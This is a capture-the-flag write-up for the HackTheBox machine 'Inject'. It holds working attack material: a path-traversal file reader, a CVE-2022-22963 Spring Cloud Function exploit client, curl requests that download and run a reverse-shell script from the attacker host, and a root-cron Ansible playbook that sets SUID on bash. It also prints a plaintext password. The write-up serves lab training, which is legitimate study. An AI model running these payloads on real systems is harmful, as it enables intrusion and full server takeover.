Inject (HTB machine)
n3ym4r

This is a recently released HTB machine. The overall flow: use an LFI in the web app to read files from the box, identify the web framework version and a known RCE for it, use that RCE to get a shell, enumerate, find another user's (phil's) plaintext password, log in as phil for the user flag, then use pspy64 to spot a root cron job whose input we control and escalate to root for the root flag.

[screenshot]

Nmap scan

┌──(n3ym4r㉿kali)-[~]
└─$ nmap 10.10.11.204                             
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 13:20 CST
Nmap scan report for 10.10.11.204
Host is up (0.86s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 96.38 seconds
┌──(n3ym4r㉿kali)-[~]
└─$ nmap -p22,8080 -sC -sV 10.10.11.204
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 13:23 CST
Nmap scan report for 10.10.11.204
Host is up (0.40s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_  256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.08 seconds

Ports 22 and 8080 are open. Nmap's "nagios-nsca" guess for 8080 is a misfingerprint; the http-title "Home" shows it is an ordinary web app, so browse to it.

Web service

[screenshot]

There is an upload button in the top right corner: an image upload feature.

Upload an arbitrary image and capture the request.

[screenshot]

After a successful upload, clicking "view image" produces this request:

GET /show_image?img=Fpq6zvOWYAIT2EU.jpeg HTTP/1.1
Host: 10.10.11.204:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.10.11.204:8080/upload
Upgrade-Insecure-Requests: 1

In Burp we can see the page fetches the uploaded file by name through the img parameter.

LFI vulnerability

A filename taken straight from a query parameter immediately suggests LFI: can the parameter be pointed at other local files?

[screenshot]

After a few attempts, six levels of ../ are enough to reach the filesystem root, and /etc/passwd comes back. The handler evidently joins the parameter onto the upload directory with no normalisation or allow-list, so any file the web user can read is exposed.

Next, try to read the application's own source.

Walking up the tree one directory at a time, a pom.xml turns up under the WebApp directory, so this is a Maven (Java/Spring) project:

[screenshot]

Note the response on the right:

        <dependency>
            <groupId>org.springframework.cloud</groupId>
            <artifactId>spring-cloud-function-web</artifactId>
            <version>3.2.2</version>
        </dependency>

So the application pulls in Spring Cloud Function (spring-cloud-function-web) version 3.2.2.
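The traversal depth search and the pom.xml read above can be automated. The following is an added example, not code from the original write-up: a fetch() callable hides the HTTP layer, find_traversal_depth() walks "../" until /etc/passwd appears, read_file() fetches any absolute path through the hole, and pom_dependencies() extracts artifact versions from a fetched POM. fake_fetch() and the paths under it (FAKE_UPLOAD_DIR, FAKE_FS) are a constructed stand-in so the script runs offline; the real upload path is not given on the page, only that six "../" were needed.

```python
"""Added example, not code from the original write-up: automate the
show_image?img= LFI. A fetch(img) callable returns the response body;
find the "../" depth that reaches "/", read files by absolute path, and
extract dependency versions from a fetched pom.xml.
"""
import posixpath
import urllib.error
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

PASSWD_MARKER = "root:x:0:0"


def http_fetch(base_url):
    """Return fetch(img) that requests base_url + /show_image?img=<img>.

    base_url e.g. "http://10.10.11.204:8080" (the write-up's target);
    HTTP errors come back as an empty body.
    """
    def fetch(img):
        url = base_url + "/show_image?" + urllib.parse.urlencode({"img": img})
        try:
            with urllib.request.urlopen(url, timeout=10) as resp:
                return resp.read().decode("utf-8", "replace")
        except urllib.error.URLError:
            return ""
    return fetch


def find_traversal_depth(fetch, probe="etc/passwd", marker=PASSWD_MARKER, max_depth=12):
    """Smallest number of "../" that makes `probe` resolve, or None."""
    for depth in range(max_depth + 1):
        if marker in fetch("../" * depth + probe):
            return depth
    return None


def read_file(fetch, depth, path):
    """Read an absolute path (e.g. "/etc/passwd") through the traversal."""
    return fetch("../" * depth + path.lstrip("/"))


def pom_dependencies(pom_xml):
    """Map artifactId -> version for each <dependency>; None when the
    version is inherited from a parent/BOM. Handles the POM namespace."""
    root = ET.fromstring(pom_xml)
    ns = root.tag[: root.tag.index("}") + 1] if root.tag.startswith("{") else ""
    deps = {}
    for dep in root.iter(ns + "dependency"):
        art = dep.find(ns + "artifactId")
        ver = dep.find(ns + "version")
        if art is not None and art.text:
            deps[art.text.strip()] = ver.text.strip() if ver is not None and ver.text else None
    return deps


# --- constructed stand-in for the target so the example runs offline ---
# The upload directory is assumed to sit six levels below "/", matching the
# six "../" the write-up needed; the real path is not given on the page.
FAKE_UPLOAD_DIR = "/var/www/WebApp/src/main/uploads"
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "frank:x:1000:1000::/home/frank:/bin/bash\n",
    "/var/www/WebApp/pom.xml": (
        '<project xmlns="http://maven.apache.org/POM/4.0.0">'
        "<dependencies>"
        "<dependency><groupId>org.springframework.cloud</groupId>"
        "<artifactId>spring-cloud-function-web</artifactId>"
        "<version>3.2.2</version></dependency>"
        "<dependency><groupId>org.springframework.boot</groupId>"
        "<artifactId>spring-boot-starter-web</artifactId></dependency>"
        "</dependencies></project>"
    ),
}


def fake_fetch(img):
    """Mimic a handler that does join(upload_dir, img) with no validation."""
    return FAKE_FS.get(posixpath.normpath(posixpath.join(FAKE_UPLOAD_DIR, img)), "")


if __name__ == "__main__":
    depth = find_traversal_depth(fake_fetch)          # 6 against the stand-in
    print("traversal depth:", depth)
    print(pom_dependencies(read_file(fake_fetch, depth, "/var/www/WebApp/pom.xml")))
```

Against the real box, swap fake_fetch for http_fetch("http://10.10.11.204:8080"). Dependencies without an explicit <version> are reported as None rather than guessed, since their version comes from the parent POM or a BOM and would need a second read.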

CVE-2022-22963 exploitation

Searching the version shows it is affected by CVE-2022-22963: Spring Cloud Function 3.1.6, 3.2.2 and earlier evaluate the spring.cloud.function.routing-expression request header as a SpEL expression, so a single header gives unauthenticated remote code execution (fixed in 3.1.7 and 3.2.3). This is not CVE-2022-22965 (Spring4Shell), which is a separate Spring Framework bug; the references below cover the right CVE:

https://sysdig.com/blog/cve-2022-22963-spring-cloud/

https://github.com/darryk10/CVE-2022-22963

The links explain exploitation clearly; the request can be sent with curl or from Burp.

Prepare a simple reverse shell script. It is staged as a file because Runtime.exec(String) splits its argument on whitespace and runs it without a shell, so the >& and /dev/tcp redirections cannot be passed in the header directly.

┌──(n3ym4r㉿kali)-[~]
└─$ cat rev.sh    
#!/bin/bash
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.12/4444 0>&1'

Start a listener:

┌──(n3ym4r㉿kali)-[~]
└─$ nc -nvlp 4444            
listening on [any] 4444 ...

Start a web server so the target can download the script (the GET /rev.sh line below appears once the exploit request has fired):

┌──(n3ym4r㉿kali)-[~]
└─$ python -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.204 - - [23/Mar/2023 13:53:07] "GET /rev.sh HTTP/1.1" 200 -

Make the target download the script. The 500 response with "cannot convert from java.lang.ProcessImpl to java.lang.String" is expected and is actually the success signal: the SpEL expression was evaluated, exec() returned a Process, and only the router's attempt to use that Process as a function name failed. The command has already run, as the hit on the Python web server confirms.

┌──(n3ym4r㉿kali)-[~]
└─$ curl -i -s -k -X 'POST'  --data-raw 'data' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget 10.10.16.12/rev.sh -O /tmp/rev.sh")' 'http://10.10.11.204:8080/functionRouter'
HTTP/1.1 500 
Transfer-Encoding: chunked
Connection: keep-alive
Content-Type: application/json
Date: Thu, 23 Mar 2023 06:20:24 GMT
Keep-Alive: timeout=4
Proxy-Connection: keep-alive

{"timestamp":"2023-03-23T06:20:24.597+00:00","status":500,"error":"Internal Server Error","message":"EL1001E: Type conversion problem, cannot convert from java.lang.ProcessImpl to java.lang.String","path":"/functionRouter"}                                                                                           

Execute rev.sh the same way (same 500, same meaning):

┌──(n3ym4r㉿kali)-[~]
└─$ curl -i -s -k -X 'POST'  --data-raw 'data' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/bin/bash /tmp/rev.sh")' 'http://10.10.11.204:8080/functionRouter'
HTTP/1.1 500 
Transfer-Encoding: chunked
Connection: keep-alive
Content-Type: application/json
Date: Thu, 23 Mar 2023 06:21:41 GMT
Keep-Alive: timeout=4
Proxy-Connection: keep-alive

{"timestamp":"2023-03-23T06:21:41.414+00:00","status":500,"error":"Internal Server Error","message":"EL1001E: Type conversion problem, cannot convert from java.lang.ProcessImpl to java.lang.String","path":"/functionRouter"}   

The listener receives the reverse shell, running as the web service user frank:

┌──(n3ym4r㉿kali)-[~]
└─$ nc -nvlp 4444            
listening on [any] 4444 ...
connect to [10.10.16.12] from (UNKNOWN) [10.10.11.204] 59054
bash: cannot set terminal process group (801): Inappropriate ioctl for device
bash: no job control in this shell
frank@inject:/$ whoami
whoami
frank
frank@inject:/$ id
id
uid=1000(frank) gid=1000(frank) groups=1000(frank)
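The two curl requests above, plus reading the 500 correctly, are the whole exploit. The following is an added example, not code from the write-up or the linked exploit repo: spel_exec() builds the write-up's exec(String) payload, send() posts it to /functionRouter, classify() tells an "executed" reply apart from other SpEL errors, and is_attack_request() is the mirror-image check a defender can run over request headers. spel_exec_bash() wraps a command in bash -c through a SpEL String[] literal so shell redirections survive; that variant is my assumption and is not shown on the page.

```python
"""Added example, not code from the write-up or the linked exploit repo:
a minimal CVE-2022-22963 client and a classifier for the router's replies.

Assumes the vulnerable route is /functionRouter as on this box. spel_exec()
is the write-up's form (Runtime.exec(String), whitespace-tokenized, no shell).
spel_exec_bash() wraps the command as bash -c via a SpEL array literal so
redirections survive; that variant is an assumption, not shown on the page.
"""
import json
import re
import urllib.error
import urllib.request

HEADER = "spring.cloud.function.routing-expression"
# Raised after exec() has already returned a Process object.
RAN_MARKER = "cannot convert from java.lang.ProcessImpl to java.lang.String"
SPEL_ERR = re.compile(r"\bEL\d{4}E\b")   # SpEL error codes, e.g. EL1001E


def spel_exec(cmd):
    """Write-up form: exec(String). Java splits `cmd` on whitespace, so no
    pipes or redirections. SpEL escapes a quote inside a literal by doubling it."""
    return 'T(java.lang.Runtime).getRuntime().exec("%s")' % cmd.replace('"', '""')


def spel_exec_bash(cmd):
    """Assumed variant: exec(String[]) with bash -c so shell syntax works."""
    return ("T(java.lang.Runtime).getRuntime().exec("
            "new String[]{'/bin/bash','-c','%s'})" % cmd.replace("'", "''"))


def send(target, expression):
    """POST the poisoned header to target/functionRouter; returns (status, body)."""
    req = urllib.request.Request(target + "/functionRouter", data=b"data", method="POST")
    req.add_header(HEADER, expression)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def classify(status, body):
    """'executed'   : expression evaluated and exec() ran (the 500 seen above)
       'spel-error' : some other SpEL error, i.e. the header is being evaluated
       'unknown'    : anything else (patched, different route, ...)"""
    try:
        msg = str(json.loads(body).get("message", ""))
    except (ValueError, AttributeError):
        msg = body
    if RAN_MARKER in msg:
        return "executed"
    if status == 500 and SPEL_ERR.search(msg):
        return "spel-error"
    return "unknown"


def is_attack_request(headers):
    """Defender-side check on request headers (dict): a routing expression
    that reaches into Java types via T(...) or touches Runtime is hostile."""
    for name, value in headers.items():
        if name.lower() == HEADER and ("T(" in value or "getRuntime" in value):
            return True
    return False


if __name__ == "__main__":
    import sys
    target, cmd = sys.argv[1], sys.argv[2]     # e.g. http://10.10.11.204:8080 "id"
    status, body = send(target, spel_exec(cmd))
    print(status, classify(status, body), body)
```

Because the router never echoes command output, classify() is the only feedback the request itself gives; out-of-band evidence (the web server hit, the listener) is what confirms a particular command did what you wanted.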

Enumeration and privilege escalation

frank@inject:/$ ls
ls
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
frank@inject:/$ cd home	
cd home
frank@inject:/home$ ls -la
ls -la
total 16
drwxr-xr-x  4 root  root  4096 Feb  1 18:38 .
drwxr-xr-x 18 root  root  4096 Feb  1 18:38 ..
drwxr-xr-x  5 frank frank 4096 Feb  1 18:38 frank
drwxr-xr-x  3 phil  phil  4096 Mar 23 06:12 phil
frank@inject:/home$ cd frank
cd frank
frank@inject:~$ ls -la
ls -la
total 28
drwxr-xr-x 5 frank frank 4096 Feb  1 18:38 .
drwxr-xr-x 4 root  root  4096 Feb  1 18:38 ..
lrwxrwxrwx 1 root  root     9 Jan 24 13:57 .bash_history -> /dev/null
-rw-r--r-- 1 frank frank 3786 Apr 18  2022 .bashrc
drwx------ 2 frank frank 4096 Feb  1 18:38 .cache
drwxr-xr-x 3 frank frank 4096 Feb  1 18:38 .local
drwx------ 2 frank frank 4096 Feb  1 18:38 .m2
-rw-r--r-- 1 frank frank  807 Feb 25  2020 .profile
frank@inject:~$ cd .m2
cd .m2
frank@inject:~/.m2$ ls
settings.xml
frank@inject:~/.m2$ cat settings.xml
cat settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>
frank@inject:~/.m2$ 

/home/frank/.m2/settings.xml, the Maven user configuration, holds phil's plaintext password: DocPhillovestoInject123. Maven stores repository credentials in the clear here unless they are encrypted with a settings-security.xml master password, so this file is always worth a look on a developer's account.

Switch to phil with that password (su needs a controlling terminal; if it refuses in a bare reverse shell, upgrade to a pty first):

bash-5.0$ su - phil
su - phil
Password: DocPhillovestoInject123
whoami
phil
pwd
/home/phil
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
ls
pspy64
user.txt
cat user.txt
814beeeaca90583b280d5130c699eb4c

User flag obtained.

Upload pspy64 and watch the process list. A root cron job (UID=0) periodically runs /usr/local/bin/ansible-parallel over /opt/automation/tasks/*.yml, i.e. it executes every .yml file in that directory as root. phil can write to that directory, so dropping in a malicious playbook gets it executed with root privileges:

2023/03/23 07:08:01 CMD: UID=0     PID=6173   | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml 
2023/03/23 07:08:01 CMD: UID=0     PID=6172   | sleep 10 
2023/03/23 07:08:01 CMD: UID=0     PID=6171   | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml 

GTFOBins describes the technique for ansible-playbook:

https://gtfobins.github.io/gtfobins/ansible-playbook/#shell

Its interactive variant (which needs a tty and only runs as yourself) is:

TF=$(mktemp)
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >$TF
ansible-playbook $TF

Here the playbook is instead written into the directory the root cron globs, so the task runs as root on the next cycle. The same single-line flow-style YAML is used, this time setting the SUID bit on /bin/bash:

echo '[{hosts: localhost, tasks: [shell: /usr/bin/chmod +s /bin/bash]}]' >> /opt/automation/tasks/escalate.yml
whoami
phil
bash -p

Once the cron has run, /bin/bash carries the SUID bit; -p stops bash from dropping the effective uid, so it keeps euid 0:

ls -la /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash
/bin/bash -p
id
uid=1001(phil) gid=1001(phil) euid=0(root) egid=0(root) groups=0(root),50(staff),1001(phil)
whoami
root
cd root
ls  
/bin/bash: line 3: cd: root: No such file or directory
pspy64
user.txt
cd /root
ls
playbook_1.yml
root.txt
cat root.txt
b1e8275be264df7aab57f5551b986580

Root flag obtained.
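The escalation works only because an unprivileged user can add files to a directory a root cron globs. The following is an added example, not code from the write-up: playbook() generates the same single-task playbook as the echo above (JSON is valid YAML, which is also why the flow-style one-liner works), can_write()/writable_playbooks() audit which entries under the tasks directory a given uid/gid set could inject through, and is_setuid_root() is the post-cron check. SAMPLE_ENTRIES are constructed stat values for the offline run, not the permissions the box actually reports.

```python
"""Added example, not code from the write-up: build the playbook the root
cron will pick up, and audit which entries under the tasks directory a user
could write (the misconfiguration this escalation depends on).

JSON is valid YAML, so json.dumps() output is a playbook ansible accepts;
the chmod +s task is the same trick the write-up uses. SAMPLE_ENTRIES are
constructed stat values, not what the box reports.
"""
import json
import os
import stat

TASKS_DIR = "/opt/automation/tasks"


def playbook(command):
    """One play on localhost with one shell task; runs with the cron's
    privileges (root here) the next time *.yml is globbed."""
    return json.dumps([{"hosts": "localhost", "tasks": [{"shell": command}]}])


def setuid_bash_playbook():
    return playbook("/usr/bin/chmod +s /bin/bash")


def can_write(mode, file_uid, file_gid, uid, gids):
    """POSIX write check from stat fields. Owner bits apply when the uid
    matches, otherwise group bits if any of the user's gids match."""
    if uid == 0:
        return True
    if file_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if file_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def writable_playbooks(entries, uid, gids):
    """entries: (path, mode, uid, gid) tuples. Returns the paths a user can
    inject through: the directory itself (new .yml) or existing .yml files."""
    hits = []
    for path, mode, fuid, fgid in entries:
        if (stat.S_ISDIR(mode) or path.endswith(".yml")) and can_write(mode, fuid, fgid, uid, gids):
            hits.append(path)
    return hits


def scan(directory=TASKS_DIR):
    """Live check for the current user; needs the directory to exist."""
    entries = []
    for p in [directory] + [os.path.join(directory, n) for n in os.listdir(directory)]:
        st = os.lstat(p)
        entries.append((p, st.st_mode, st.st_uid, st.st_gid))
    return writable_playbooks(entries, os.getuid(), set(os.getgroups()))


def is_setuid_root(path="/bin/bash"):
    """True once the cron has run the playbook: owner root plus the SUID bit."""
    st = os.stat(path)
    return st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)


# Constructed: a root-owned tasks dir that group "staff" (gid 50) may write,
# holding one root-owned playbook. Not the real modes from the box.
SAMPLE_ENTRIES = [
    (TASKS_DIR, stat.S_IFDIR | 0o775, 0, 50),
    (TASKS_DIR + "/playbook_1.yml", stat.S_IFREG | 0o644, 0, 0),
]

if __name__ == "__main__":
    print(writable_playbooks(SAMPLE_ENTRIES, 1001, {1001, 50}))   # phil: the directory
    print(setuid_bash_playbook())
```

On the box, scan() run as phil lists what can be abused, and open(TASKS_DIR + "/escalate.yml", "w").write(setuid_bash_playbook()) is the equivalent of the echo used above; poll is_setuid_root() until the cron has fired, then run /bin/bash -p. The fix on the defending side is the one the audit implies: the globbed directory and every file in it must be writable only by root.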